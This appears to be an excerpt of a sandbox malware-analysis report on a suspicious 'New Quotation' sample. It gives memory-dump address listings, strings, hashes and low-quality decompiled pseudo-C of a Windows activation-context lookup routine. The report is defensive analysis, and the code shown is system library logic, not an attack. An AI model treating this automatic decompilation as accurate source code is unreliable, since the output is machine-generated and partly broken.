                                                                                                                                                                                          0x1d7ea2de
                                                                                                                                                                                          0x1d83783a
                                                                                                                                                                                          0x1d83783c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d837842
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d837842
                                                                                                                                                                                          0x1d7ea2e4
                                                                                                                                                                                          0x1d7ea2e4
                                                                                                                                                                                          0x1d7ea2e4
                                                                                                                                                                                          0x1d7ea2eb
                                                                                                                                                                                          0x1d8378ed
                                                                                                                                                                                          0x1d8378ed
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea2f1
                                                                                                                                                                                          0x1d7ea2f1
                                                                                                                                                                                          0x1d7ea300
                                                                                                                                                                                          0x1d7ea300
                                                                                                                                                                                          0x1d7ea300
                                                                                                                                                                                          0x1d7ea30a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea310
                                                                                                                                                                                          0x1d7ea325
                                                                                                                                                                                          0x1d7ea32c
                                                                                                                                                                                          0x1d7ea4f7
                                                                                                                                                                                          0x1d7ea500
                                                                                                                                                                                          0x1d7ea502
                                                                                                                                                                                          0x1d7ea505
                                                                                                                                                                                          0x1d7ea50b
                                                                                                                                                                                          0x1d7ea5a5
                                                                                                                                                                                          0x1d7ea5b8
                                                                                                                                                                                          0x1d7ea5be
                                                                                                                                                                                          0x1d7ea5c2
                                                                                                                                                                                          0x1d7ea5cb
                                                                                                                                                                                          0x1d7ea5d1
                                                                                                                                                                                          0x1d7ea5d1
                                                                                                                                                                                          0x1d7ea5cb
                                                                                                                                                                                          0x1d7ea50b
                                                                                                                                                                                          0x1d7ea523
                                                                                                                                                                                          0x1d7ea549
                                                                                                                                                                                          0x1d7ea551
                                                                                                                                                                                          0x1d7ea525
                                                                                                                                                                                          0x1d7ea53c
                                                                                                                                                                                          0x1d7ea543
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea543
                                                                                                                                                                                          0x1d7ea332
                                                                                                                                                                                          0x1d7ea337
                                                                                                                                                                                          0x1d7ea393
                                                                                                                                                                                          0x1d7ea399
                                                                                                                                                                                          0x1d7ea339
                                                                                                                                                                                          0x1d7ea339
                                                                                                                                                                                          0x1d7ea342
                                                                                                                                                                                          0x1d7ea344
                                                                                                                                                                                          0x1d7ea34a
                                                                                                                                                                                          0x1d7ea34e
                                                                                                                                                                                          0x1d7ea355
                                                                                                                                                                                          0x1d7ea359
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea360
                                                                                                                                                                                          0x1d7ea363
                                                                                                                                                                                          0x1d7ea3fa
                                                                                                                                                                                          0x1d7ea3fc
                                                                                                                                                                                          0x1d837847
                                                                                                                                                                                          0x1d83784f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d837855
                                                                                                                                                                                          0x1d837855
                                                                                                                                                                                          0x1d837859
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83785f
                                                                                                                                                                                          0x1d83785f
                                                                                                                                                                                          0x1d837862
                                                                                                                                                                                          0x1d837868
                                                                                                                                                                                          0x1d837892
                                                                                                                                                                                          0x1d837894
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83786a
                                                                                                                                                                                          0x1d83786d
                                                                                                                                                                                          0x1d83787e
                                                                                                                                                                                          0x1d83788b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d837880
                                                                                                                                                                                          0x1d837880
                                                                                                                                                                                          0x1d837885
                                                                                                                                                                                          0x1d83789a
                                                                                                                                                                                          0x1d83789a
                                                                                                                                                                                          0x1d83789f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83789f
                                                                                                                                                                                          0x1d83786f
                                                                                                                                                                                          0x1d837873
                                                                                                                                                                                          0x1d83788e
                                                                                                                                                                                          0x1d83788e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83788e
                                                                                                                                                                                          0x1d83786d
                                                                                                                                                                                          0x1d837868
                                                                                                                                                                                          0x1d837859
                                                                                                                                                                                          0x1d7ea402
                                                                                                                                                                                          0x1d7ea402
                                                                                                                                                                                          0x1d7ea405
                                                                                                                                                                                          0x1d7ea554
                                                                                                                                                                                          0x1d7ea556
                                                                                                                                                                                          0x1d7ea55e
                                                                                                                                                                                          0x1d7ea564
                                                                                                                                                                                          0x1d7ea56a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea570
                                                                                                                                                                                          0x1d7ea570
                                                                                                                                                                                          0x1d7ea575
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea575
                                                                                                                                                                                          0x1d7ea40b
                                                                                                                                                                                          0x1d7ea40e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea414
                                                                                                                                                                                          0x1d7ea414
                                                                                                                                                                                          0x1d7ea418
                                                                                                                                                                                          0x1d7ea420
                                                                                                                                                                                          0x1d7ea426
                                                                                                                                                                                          0x1d7ea42c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea432
                                                                                                                                                                                          0x1d7ea432
                                                                                                                                                                                          0x1d7ea437
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea437
                                                                                                                                                                                          0x1d7ea42c
                                                                                                                                                                                          0x1d7ea40e
                                                                                                                                                                                          0x1d7ea405
                                                                                                                                                                                          0x1d7ea369
                                                                                                                                                                                          0x1d7ea369
                                                                                                                                                                                          0x1d7ea36c
                                                                                                                                                                                          0x1d8378e3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea372
                                                                                                                                                                                          0x1d7ea372
                                                                                                                                                                                          0x1d7ea374
                                                                                                                                                                                          0x1d7ea452
                                                                                                                                                                                          0x1d7ea459
                                                                                                                                                                                          0x1d7ea57e
                                                                                                                                                                                          0x1d7ea585
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea594
                                                                                                                                                                                          0x1d7ea594
                                                                                                                                                                                          0x1d7ea598
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea598
                                                                                                                                                                                          0x1d7ea45f
                                                                                                                                                                                          0x1d7ea45f
                                                                                                                                                                                          0x1d7ea47f
                                                                                                                                                                                          0x1d7ea483
                                                                                                                                                                                          0x1d7ea485
                                                                                                                                                                                          0x1d7ea487
                                                                                                                                                                                          0x1d7ea489
                                                                                                                                                                                          0x1d7ea48b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea491
                                                                                                                                                                                          0x1d7ea493
                                                                                                                                                                                          0x1d8378a8
                                                                                                                                                                                          0x1d8378b1
                                                                                                                                                                                          0x1d8378c3
                                                                                                                                                                                          0x1d8378c3
                                                                                                                                                                                          0x1d8378cb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8378d6
                                                                                                                                                                                          0x1d8378dc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8378de
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8378de
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8378dc
                                                                                                                                                                                          0x1d8378c3
                                                                                                                                                                                          0x1d8378b1
                                                                                                                                                                                          0x1d7ea499
                                                                                                                                                                                          0x1d7ea499
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea499
                                                                                                                                                                                          0x1d7ea48b
                                                                                                                                                                                          0x1d7ea37a
                                                                                                                                                                                          0x1d7ea37a
                                                                                                                                                                                          0x1d7ea37f
                                                                                                                                                                                          0x1d7ea381
                                                                                                                                                                                          0x1d7ea49b
                                                                                                                                                                                          0x1d7ea49b
                                                                                                                                                                                          0x1d7ea4a2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea4a8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea4a8
                                                                                                                                                                                          0x1d7ea387
                                                                                                                                                                                          0x1d7ea387
                                                                                                                                                                                          0x1d7ea38c
                                                                                                                                                                                          0x1d7ea38e
                                                                                                                                                                                          0x1d7ea38e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea38c
                                                                                                                                                                                          0x1d7ea381
                                                                                                                                                                                          0x1d7ea374
                                                                                                                                                                                          0x1d7ea36c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea363
                                                                                                                                                                                          0x1d7ea360
                                                                                                                                                                                          0x1d7ea337
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea32c
                                                                                                                                                                                          0x1d8378f1
                                                                                                                                                                                          0x1d8378f1
                                                                                                                                                                                          0x1d8378fc
                                                                                                                                                                                          0x1d837904
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d837904
                                                                                                                                                                                          0x1d7ea2eb
                                                                                                                                                                                          0x1d7ea2de
                                                                                                                                                                                          0x1d7ea2ac
                                                                                                                                                                                          0x1d7ea28e
                                                                                                                                                                                          0x1d7ea4cc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea269
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea39c
                                                                                                                                                                                          0x1d7ea39c
                                                                                                                                                                                          0x1d7ea39f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea3a5
                                                                                                                                                                                          0x1d7ea3a8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea3a8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea39f
                                                                                                                                                                                          0x1d7ea250
                                                                                                                                                                                          0x1d7ea1e8
                                                                                                                                                                                          0x1d7ea1f1
                                                                                                                                                                                          0x1d8377d8
                                                                                                                                                                                          0x1d8377dd
                                                                                                                                                                                          0x1d8377e2
                                                                                                                                                                                          0x1d8377e7
                                                                                                                                                                                          0x1d8377e7
                                                                                                                                                                                          0x1d8377e9
                                                                                                                                                                                          0x1d8377eb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea1f7
                                                                                                                                                                                          0x1d7ea1f7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea1f7
                                                                                                                                                                                          0x1d7ea1f1
                                                                                                                                                                                          0x1d7ea1e6
                                                                                                                                                                                          0x1d7ea1dd
                                                                                                                                                                                          0x1d7ea1d4
                                                                                                                                                                                          0x1d7ea1cc
                                                                                                                                                                                          0x1d7ea1c0
                                                                                                                                                                                          0x1d7ea1b1
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D837807
                                                                                                                                                                                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1D8378F3
                                                                                                                                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 1D8377DD, 1D837802
                                                                                                                                                                                          • Actx , xrefs: 1D837819, 1D837880
                                                                                                                                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D8377E2
                                                                                                                                                                                          • SsHd, xrefs: 1D7EA304
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                                                          • API String ID: 0-1988757188
                                                                                                                                                                                          • Opcode ID: da5954cc47412dd18720f4d859fbb4d8e5b9d9adbe658d53f3386a7e17dba879
                                                                                                                                                                                          • Instruction ID: d0e2d8bc06ab8f1cdbcf68e32d72f4c4dea9f1ce275953de1394022c3ed59493
                                                                                                                                                                                          • Opcode Fuzzy Hash: da5954cc47412dd18720f4d859fbb4d8e5b9d9adbe658d53f3386a7e17dba879
                                                                                                                                                                                          • Instruction Fuzzy Hash: B6E1D1706043429FD715EE28C884B6BB7E1BF892B4F114A2EF969CB291D731D845CB93
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7ED690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 54%
                                                                                                                                                                                          			E1D7ED690(signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v56;
				char _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int* _v84;
				char _v88;
				signed int _v92;
				char _v93;
				signed int _v104;
				char _v117;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t150;
				char _t158;
				intOrPtr _t160;
				intOrPtr _t163;
				intOrPtr* _t164;
				intOrPtr _t170;
				signed int _t171;
				void* _t172;
				signed int _t195;
				intOrPtr* _t201;
				signed int _t205;
				intOrPtr* _t209;
				void* _t210;
				intOrPtr _t211;
				intOrPtr _t213;
				signed int _t214;
				intOrPtr* _t215;
				intOrPtr _t217;
				intOrPtr _t225;
				intOrPtr _t227;
				intOrPtr _t228;
				void* _t233;
				intOrPtr* _t234;
				signed int _t242;
				void* _t246;
				signed int _t247;
				signed int _t252;
				void* _t253;
				intOrPtr* _t254;
				intOrPtr _t255;
				signed int _t256;
				signed int _t258;

				_t258 = (_t256 & 0xfffffff8) - 0x5c;
				_v8 =  *0x1d8cb370 ^ _t258;
				_t217 =  *[fs:0x18];
				_t241 = _a16;
				_t209 = _a20;
				_t150 =  *((intOrPtr*)(_t217 + 0x30));
				_t252 = _a8;
				_v84 = _t241;
				_v80 = _t209;
				if( *((intOrPtr*)(_t150 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t150 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t217 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t151 = 0xc0150001;
						L24:
						_pop(_t246);
						_pop(_t253);
						_pop(_t210);
						return E1D814B50(_t151, _t210, _v8 ^ _t258, _t241, _t246, _t253);
					}
				}
				L1:
				_v88 = 0;
				if(_t241 == 0) {
					L49:
					_t151 = 0xc000000d;
					goto L24;
				}
				_t241 = _a4;
				if((_t241 & 0xfffffff8) != 0) {
					goto L49;
				}
				if((_t241 & 0x00000007) == 0) {
					if(_t209 != 0) {
						L5:
						if( *_t209 < 0x24) {
							goto L49;
						}
						L6:
						if((_t241 & 0x00000002) != 0) {
							if(_t209 + 0x2c <=  *_t209 + _t209) {
								goto L7;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							L48:
							_push(0);
							_push(0x33);
							E1D85EF10();
							_t258 = _t258 + 0x14;
							goto L49;
						}
						L7:
						if((_t241 & 0x00000004) != 0) {
							if(_t209 + 0x40 <=  *_t209 + _t209) {
								goto L8;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							goto L48;
						}
						L8:
						_t241 =  &_v76;
						_v48 = _a12;
						_v60 = 0x18;
						_v56 = 0;
						_v52 = _t252;
						_v40 = 0;
						_v64 = 0;
						_v44 = 0;
						if(E1D7ED580( &_v60,  &_v76,  &_v88,  &_v64) < 0) {
							goto L24;
						}
						_t151 = 0;
						if(0 < 0) {
							goto L24;
						}
						_t158 = _v88;
						if(_t158 < 0x28) {
							L34:
							_t254 = _v76;
							L91:
							_push(_t158);
							E1D85EF10(0x33, 0, "RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section\n", _t254);
							_t258 = _t258 + 0x14;
							_t151 = 0xc0150003;
							goto L24;
						}
						_t247 = _v64;
						while(1) {
							L12:
							_t254 = _v76;
							if( *_t254 != 0x64487347) {
								goto L91;
							}
							_t211 =  *((intOrPtr*)(_t254 + 0x14));
							_t160 = 1;
							if(_t211 == 0) {
								L19:
								_t225 =  *[fs:0x18];
								_t255 = _v44;
								_v92 = 0;
								_t247 = 0;
								_v68 = _t225;
								_t241 =  *(_t225 + 0x30);
								_v72 = _t241;
								L20:
								while(1) {
									if(_t255 <= 2) {
										_t163 = _t255;
										if(_t163 == 0) {
											_t164 =  *((intOrPtr*)(_t225 + 0x1a8));
											if(_t164 == 0) {
												L43:
												_t213 =  *((intOrPtr*)(_t241 + 0x1f8));
												_v92 = 0;
												if(_t213 == 0) {
													L28:
													_t213 =  *((intOrPtr*)(_t241 + 0x200));
													_v92 = 0xfffffffc;
													if(_t213 == 0) {
														goto L21;
													}
													_t255 = 3;
													_v44 = 3;
													L22:
													if(_t213 != 0) {
														_t241 = _v52;
														_t151 = E1D7EA600(_t213, _v52, _v48,  &_v76,  &_v88);
														if(_t151 < 0) {
															if(_t151 != 0xc0150001 || _t255 == 3) {
																L32:
																if(_t151 < 0) {
																	if(_t151 != 0xc0150001) {
																		goto L24;
																	}
																	goto L23;
																}
																_t158 = _v88;
																if(_t158 >= 0x28) {
																	goto L12;
																}
																goto L34;
															} else {
																_t225 = _v68;
																_t241 = _v72;
																continue;
															}
														}
														_t241 = _v92;
														_v40 = (0 | _t241 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t241 == 0x00000000;
														asm("sbb edi, edi");
														_t247 =  ~(_t241 - 0xfffffffc) & _t241;
														_t151 = 0;
														goto L32;
													}
													L23:
													_t151 = 0xc0150008;
													goto L24;
												}
												_t255 = 2;
												_v44 = 2;
												goto L22;
											}
											_t170 =  *_t164;
											if(_t170 == 0) {
												goto L43;
											}
											_t171 =  *((intOrPtr*)(_t170 + 4));
											_v92 = _t171;
											if(_t171 == 0) {
												L83:
												if(_t213 == 0) {
													goto L43;
												}
												L84:
												_t255 = 1;
												_v44 = 1;
												goto L22;
											}
											if(_t171 != 0xfffffffc) {
												if(_t171 != 0xfffffffd) {
													_t213 =  *((intOrPtr*)(_t171 + 0x10));
													goto L83;
												}
												_t213 = "Actx ";
												goto L84;
											}
											_t213 =  *((intOrPtr*)(_t241 + 0x200));
											goto L83;
										}
										_t172 = _t163 - 1;
										if(_t172 == 0) {
											goto L43;
										}
										if(_t172 != 1) {
											goto L21;
										}
										goto L28;
									}
									L21:
									if(_t255 > 3) {
										_t151 = 0xc00000e5;
										goto L24;
									}
									goto L22;
								}
							}
							if( *((intOrPtr*)(_t254 + 8)) != 1) {
								_t160 = 0;
							}
							_t227 =  *((intOrPtr*)(_t254 + 0x1c));
							if(_t227 != 0) {
								if(_t160 == 0) {
									goto L16;
								}
								_v92 = 0;
								_t233 =  *((intOrPtr*)(_t227 + _t254 + 4)) +  *_v84 %  *(_t227 + _t254) * 8;
								_t234 = _t233 + _t254;
								_t201 =  *((intOrPtr*)(_t233 + _t254 + 4)) + _t254;
								_v72 = _t234;
								if( *_t234 <= 0) {
									goto L19;
								} else {
									goto L54;
								}
								while(1) {
									L54:
									_t214 =  *_t201 + _t254;
									_v68 = _t201 + 4;
									if(E1D828050(_t214, _v84, 0x10) == 0x10) {
										goto L18;
									}
									_t205 = _v92 + 1;
									_v92 = _t205;
									_t201 = _v68;
									if(_t205 <  *_v72) {
										continue;
									}
									goto L19;
								}
							} else {
								L16:
								_t228 =  *((intOrPtr*)(_t254 + 0x18));
								if(( *(_t254 + 0x10) & 0x00000001) == 0) {
									_t174 = _t228 + _t254;
									_v92 = _t228 + _t254;
									while(E1D828050(_t174, _v84, 0x10) != 0x10) {
										_t174 = _v92 + 0x1c;
										_v92 = _v92 + 0x1c;
										_t211 = _t211 - 1;
										if(_t211 != 0) {
											continue;
										}
										goto L19;
									}
									_t214 = _v92;
									L18:
									if(_t214 != 0) {
										if( *((intOrPtr*)(_t214 + 0x10)) == 0) {
											goto L19;
										}
										_t241 = _v80;
										if(_t241 != 0) {
											 *((intOrPtr*)(_t241 + 4)) =  *((intOrPtr*)(_t254 + 0xc));
											 *((intOrPtr*)(_t241 + 8)) =  *((intOrPtr*)(_t214 + 0x10)) + _t254;
											 *((intOrPtr*)(_t241 + 0xc)) =  *((intOrPtr*)(_t214 + 0x14));
											if(_t241 + 0x28 <=  *_t241 + _t241) {
												 *((intOrPtr*)(_t241 + 0x24)) =  *((intOrPtr*)(_t214 + 0x18));
											}
										}
										if((_t247 - 0x00000001 | 0x00000007) != 0xffffffff) {
											_t215 =  *((intOrPtr*)(_t247 + 0x14));
											if(_t215 != 0 && (( *(_t247 + 0x1c) & 0x00000008) == 0 || ( *(_t247 + 0x3c) & 0x00000008) == 0)) {
												_v93 = 0;
												 *0x1d8c91e0(3, _t247,  *((intOrPtr*)(_t247 + 0x10)),  *((intOrPtr*)(_t247 + 0x18)), 0,  &_v93);
												 *_t215();
												 *(_t247 + 0x1c) =  *(_t247 + 0x1c) | 0x00000008;
												_t241 = _v104;
												if(_v117 != 0) {
													 *(_t247 + 0x3c) =  *(_t247 + 0x3c) | 0x00000008;
												}
											}
										}
										if(_t241 == 0 || E1D7D4428(_a4, _t241, _t247,  &_v60, _t254,  *((intOrPtr*)(_t254 + 0x20)),  *((intOrPtr*)(_t254 + 0x24)), _v88) >= 0) {
											_t151 = 0;
										}
										goto L24;
									}
									goto L19;
								}
								_t242 = _v84;
								_v36 =  *_t242;
								_v32 =  *((intOrPtr*)(_t242 + 4));
								_v28 =  *((intOrPtr*)(_t242 + 8));
								_v24 =  *((intOrPtr*)(_t242 + 0xc));
								_t195 = E1D818170( &_v36, _t228 + _t254, _t211, 0x1c, E1D7CB600);
								_t258 = _t258 + 0x14;
								_t214 = _t195;
							}
							goto L18;
						}
						goto L91;
					}
					goto L6;
				}
				if(_t209 == 0) {
					goto L49;
				}
				goto L5;
			}




























































                                                                                                                                                                                          0x1d7ed698
                                                                                                                                                                                          0x1d7ed6a2
                                                                                                                                                                                          0x1d7ed6a6
                                                                                                                                                                                          0x1d7ed6ad
                                                                                                                                                                                          0x1d7ed6b1
                                                                                                                                                                                          0x1d7ed6b4
                                                                                                                                                                                          0x1d7ed6b8
                                                                                                                                                                                          0x1d7ed6c3
                                                                                                                                                                                          0x1d7ed6c7
                                                                                                                                                                                          0x1d7ed6cb
                                                                                                                                                                                          0x1d7ed90e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83913f
                                                                                                                                                                                          0x1d83913f
                                                                                                                                                                                          0x1d7ed847
                                                                                                                                                                                          0x1d7ed84b
                                                                                                                                                                                          0x1d7ed84c
                                                                                                                                                                                          0x1d7ed84d
                                                                                                                                                                                          0x1d7ed858
                                                                                                                                                                                          0x1d7ed858
                                                                                                                                                                                          0x1d7ed90e
                                                                                                                                                                                          0x1d7ed6d1
                                                                                                                                                                                          0x1d7ed6d1
                                                                                                                                                                                          0x1d7ed6db
                                                                                                                                                                                          0x1d839164
                                                                                                                                                                                          0x1d839164
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d839164
                                                                                                                                                                                          0x1d7ed6e1
                                                                                                                                                                                          0x1d7ed6ea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed6f3
                                                                                                                                                                                          0x1d7ed8fc
                                                                                                                                                                                          0x1d7ed701
                                                                                                                                                                                          0x1d7ed704
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed70a
                                                                                                                                                                                          0x1d7ed70d
                                                                                                                                                                                          0x1d7ed922
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d839149
                                                                                                                                                                                          0x1d83914e
                                                                                                                                                                                          0x1d839153
                                                                                                                                                                                          0x1d839158
                                                                                                                                                                                          0x1d839158
                                                                                                                                                                                          0x1d83915a
                                                                                                                                                                                          0x1d83915c
                                                                                                                                                                                          0x1d839161
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d839161
                                                                                                                                                                                          0x1d7ed713
                                                                                                                                                                                          0x1d7ed716
                                                                                                                                                                                          0x1d7ed936
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83916e
                                                                                                                                                                                          0x1d839173
                                                                                                                                                                                          0x1d839178
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d839178
                                                                                                                                                                                          0x1d7ed71c
                                                                                                                                                                                          0x1d7ed71f
                                                                                                                                                                                          0x1d7ed723
                                                                                                                                                                                          0x1d7ed72f
                                                                                                                                                                                          0x1d7ed73c
                                                                                                                                                                                          0x1d7ed745
                                                                                                                                                                                          0x1d7ed749
                                                                                                                                                                                          0x1d7ed751
                                                                                                                                                                                          0x1d7ed759
                                                                                                                                                                                          0x1d7ed768
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed76e
                                                                                                                                                                                          0x1d7ed772
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed778
                                                                                                                                                                                          0x1d7ed77f
                                                                                                                                                                                          0x1d7ed8f1
                                                                                                                                                                                          0x1d7ed8f1
                                                                                                                                                                                          0x1d839370
                                                                                                                                                                                          0x1d839370
                                                                                                                                                                                          0x1d83937b
                                                                                                                                                                                          0x1d839380
                                                                                                                                                                                          0x1d839383
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d839383
                                                                                                                                                                                          0x1d7ed785
                                                                                                                                                                                          0x1d7ed790
                                                                                                                                                                                          0x1d7ed790
                                                                                                                                                                                          0x1d7ed790
                                                                                                                                                                                          0x1d7ed79a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed7a0
                                                                                                                                                                                          0x1d7ed7a3
                                                                                                                                                                                          0x1d7ed7a7
                                                                                                                                                                                          0x1d7ed80d
                                                                                                                                                                                          0x1d7ed80d
                                                                                                                                                                                          0x1d7ed816
                                                                                                                                                                                          0x1d7ed81c
                                                                                                                                                                                          0x1d7ed820
                                                                                                                                                                                          0x1d7ed822
                                                                                                                                                                                          0x1d7ed826
                                                                                                                                                                                          0x1d7ed829
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed830
                                                                                                                                                                                          0x1d7ed833
                                                                                                                                                                                          0x1d7ed85d
                                                                                                                                                                                          0x1d7ed860
                                                                                                                                                                                          0x1d8392e0
                                                                                                                                                                                          0x1d8392e8
                                                                                                                                                                                          0x1d7ed941
                                                                                                                                                                                          0x1d7ed941
                                                                                                                                                                                          0x1d7ed949
                                                                                                                                                                                          0x1d7ed94f
                                                                                                                                                                                          0x1d7ed874
                                                                                                                                                                                          0x1d7ed874
                                                                                                                                                                                          0x1d7ed87a
                                                                                                                                                                                          0x1d7ed884
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed886
                                                                                                                                                                                          0x1d7ed88b
                                                                                                                                                                                          0x1d7ed83e
                                                                                                                                                                                          0x1d7ed840
                                                                                                                                                                                          0x1d7ed891
                                                                                                                                                                                          0x1d7ed8a5
                                                                                                                                                                                          0x1d7ed8ac
                                                                                                                                                                                          0x1d83933a
                                                                                                                                                                                          0x1d7ed8dc
                                                                                                                                                                                          0x1d7ed8de
                                                                                                                                                                                          0x1d83935b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d839361
                                                                                                                                                                                          0x1d7ed8e4
                                                                                                                                                                                          0x1d7ed8eb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d839349
                                                                                                                                                                                          0x1d839349
                                                                                                                                                                                          0x1d83934d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83934d
                                                                                                                                                                                          0x1d83933a
                                                                                                                                                                                          0x1d7ed8b2
                                                                                                                                                                                          0x1d7ed8d2
                                                                                                                                                                                          0x1d7ed8d6
                                                                                                                                                                                          0x1d7ed8d8
                                                                                                                                                                                          0x1d7ed8da
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed8da
                                                                                                                                                                                          0x1d7ed842
                                                                                                                                                                                          0x1d7ed842
